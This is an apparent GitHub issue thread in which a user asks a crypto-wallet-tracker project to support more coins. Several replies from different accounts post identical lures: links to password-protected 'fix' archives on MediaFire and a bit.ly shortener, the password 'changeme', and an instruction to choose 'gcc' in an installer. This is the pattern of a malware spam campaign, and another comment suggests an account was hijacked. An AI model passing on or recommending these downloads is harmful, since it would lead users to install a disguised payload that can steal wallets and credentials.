### ISSUE TITLE
Can you add support of BTC, LTC, Sol, USDT, and TON please

### ISSUE THREAD

**Issue by MBGGAN** [can-kat/crypto-wallet-tracker#17]
Can you add support of BTC, LTC, Sol, USDT, and TON please i really want it.

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Check your signed in sessions for unknown people

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
